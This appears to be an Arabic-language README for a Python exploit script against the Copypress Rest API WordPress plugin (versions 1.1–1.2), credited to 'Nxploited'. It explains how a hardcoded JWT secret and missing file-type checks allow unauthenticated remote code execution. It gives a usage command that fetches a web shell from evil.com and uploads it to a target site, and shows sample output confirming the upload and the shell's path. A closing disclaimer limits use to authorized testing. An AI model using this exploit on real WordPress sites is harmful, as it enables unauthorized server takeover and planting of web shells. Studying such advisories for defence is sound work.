
Copypress Rest API 1.1 - 1.2 - الافتقار إلى سر JWT قابل للتكوين والتحقق من نوع الملفات يؤدي إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة
إضافة Copypress Rest API 1.1 - 1.2 - غياب سر JWT قابل للتهيئة والتحقق من نوع الملفات يؤدي إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة
إن إضافة Copypress Rest API لـ WordPress (الإصدارات من 1.1 إلى 1.2) معرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر دالة copyreap_handle_image().
تستخدم الإضافة مفتاح توقيع JWT مثبَّتًا في الكود عندما لا يتم تعيين أي سر، ولا تتحقق من أنواع الملفات، مما يسمح للمهاجمين غير المصادَق عليهم بتزوير الرموز ورفع ملفات تعسفية (مثل قشرة PHP) عبر نقطة نهاية معالج الصور.
اسم السكربت: CVE-2025-8625.py
يقوم هذا السكربت المكتوب بلغة Python بأتمتة استغلال الثغرة، مما يتيح لك توليد JWT صالح، وإرسال طلب مُصمَّم، ورفع ملف ضار (قشرة ويب) إلى موقع WordPress المستهدف.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: رابط موقع WordPress المستهدف-shell / --shell: رابط مباشر لقشرة الويب أو ملف PHP ضارمثال على الإخراج:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
تم رفع القشرة بنجاح! 🎉
مثال على مسار القشرة:
https://target.com/wp-content/uploads/2025/10/shell.php
هذه الأداة مخصصة لأغراض تعليمية ولاختبار الاختراق المصرح به فقط.
استخدامها ضد أهداف دون إذن صريح يعد غير قانوني.
بواسطة: Nxploited (Khaled Alenazi)